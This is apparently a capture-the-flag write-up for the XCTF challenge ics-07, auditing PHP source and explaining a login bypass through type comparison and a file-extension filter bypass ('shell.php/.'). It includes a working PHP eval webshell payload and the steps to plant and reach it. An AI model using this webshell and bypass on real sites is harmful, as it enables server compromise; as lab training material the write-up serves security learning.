
[xctf] ics-07 攻防世界 (code audit + regex + file upload)

Views: 77   Published: 2023-11-04 23:09:18

ics-07 攻防世界

Code audit + regex + file upload + login session

The source code is given (index.phps, reachable through the "view-source" link):

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>cetc7</title>
</head>
<body>
<?php
session_start();

// Block 1: page must be set, otherwise the source is shown and the script dies.
if (!isset($_GET[page])) {
    show_source(__FILE__);
    die();
}
if (isset($_GET[page]) && $_GET[page] != 'index.php') {
    include('flag.php');
} else {
    header('Location: ?page=flag.php');
}
?>
<form action="#" method="get">
    page : <input type="text" name="page" value="">
    id : <input type="text" name="id" value="">
    <input type="submit" name="submit" value="submit">
</form>
<br />
<a href="index.phps">view-source</a>
<?php
// Block 2: arbitrary file write, reachable only with $_SESSION['admin'] set.
// The extension check runs on "backup/" . $file and only looks at the end of the string.
if ($_SESSION['admin']) {
    $con = $_POST['con'];
    $file = $_POST['file'];
    $filename = "backup/" . $file;
    if (preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)) {
        die("Bad file extension");
    } else {
        chdir('uploaded');
        $f = fopen($filename, 'w');
        fwrite($f, $con);
        fclose($f);
    }
}
?>
<?php
// Block 3: "login". floatval() returns a float, so the strict !== '1' is always true;
// only the trailing '9' check constrains the id.
if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {
    include 'config.php';
    $id = mysql_real_escape_string($_GET[id]);
    $sql = "select * from cetc007.user where id='$id'";
    $result = mysql_query($sql);
    $result = mysql_fetch_object($result);
} else {
    $result = False;
    die();
}
if (!$result) die("<br >something wae wrong ! <br>");
if ($result) {
    echo "id: " . $result->id . "</br>";
    echo "name:" . $result->user . "</br>";
    $_SESSION['admin'] = True;
}
?>
</body>
</html>

Login session

The relevant part is the third PHP block:

<?php
if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {
    include 'config.php';
    $id = mysql_real_escape_string($_GET[id]);
    $sql = "select * from cetc007.user where id='$id'";
    $result = mysql_query($sql);
    $result = mysql_fetch_object($result);
} else {
    $result = False;
    die();
}
if (!$result) die("<br >something wae wrong ! <br>");
if ($result) {
    echo "id: " . $result->id . "</br>";
    echo "name:" . $result->user . "</br>";
    $_SESSION['admin'] = True;
}
?>

floatval() returns the floating-point value of a variable. Because it returns a float while '1' is a string, the strict comparison floatval($_GET[id]) !== '1' is always true, so the only condition that actually constrains the id is substr($_GET[id], -1) === '9': the last character must be '9'.

mysql_real_escape_string() escapes the id to prevent SQL injection; it prefixes a backslash to the characters

\x00, \n, \r, \, ', ", \x1a

so the quotes around $id cannot be broken out of. It does not change how MySQL interprets the value, though: the id column is an integer, and when MySQL compares an integer column with a string it converts the string to a number from its leading numeric prefix (with a "Truncated incorrect DOUBLE value" warning). So construct an id that starts with 1 and ends with 9, where id 1 exists in the database:

id=1/9

'1/9' ends in '9', passes the escaping untouched, and is compared as the number 1, so the query returns the user with id 1, the page prints the id and name, and $_SESSION['admin'] is set to True for this session cookie.

Upload the shell

The filter

(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename))

only rejects a filename that ends in .php, .php3, .php4, .php5, .php7, .pht or .phtml:
/i makes the match case-insensitive (so .PHP and .PhP5 are caught as well);
$ anchors the match at the end of the string (and, as in any PCRE pattern without the D modifier, also just before a trailing newline, so appending %0a does not help).
The check runs on $filename = "backup/".$file, so anything that places one more character after the extension slips through. Construct

$file=shell.php/.
con=<?php eval($_POST['cmd']); ?>

"backup/shell.php/." does not end with a blocked extension, but PHP normalises the path before opening it and drops the trailing "/." segment, so fopen() creates backup/shell.php with the webshell as its content. The upload must be a POST carrying the session cookie from the login step, because the upload block only runs when $_SESSION['admin'] is set, and page must still be present in the query string or the script dies at the first check.

Then connect to uploaded/backup/shell.php with AntSword (蚁剑), using cmd as the password, and look for the flag.

chdir() changes the working directory.

chdir('uploaded');

Because the script calls chdir('uploaded') before fopen("backup/".$file), the file is written under uploaded/backup/, which is why the shell is reached at uploaded/backup/shell.php.